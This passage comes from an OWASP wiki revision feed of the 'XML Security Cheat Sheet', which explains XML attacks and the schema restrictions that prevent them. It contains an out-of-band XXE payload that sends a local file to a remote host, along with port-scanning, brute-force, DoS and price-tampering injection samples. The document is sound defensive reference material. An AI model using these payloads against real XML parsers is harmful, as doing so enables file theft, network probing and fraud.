&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224437</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224437"/>
				<updated>2016-12-21T20:24:03Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
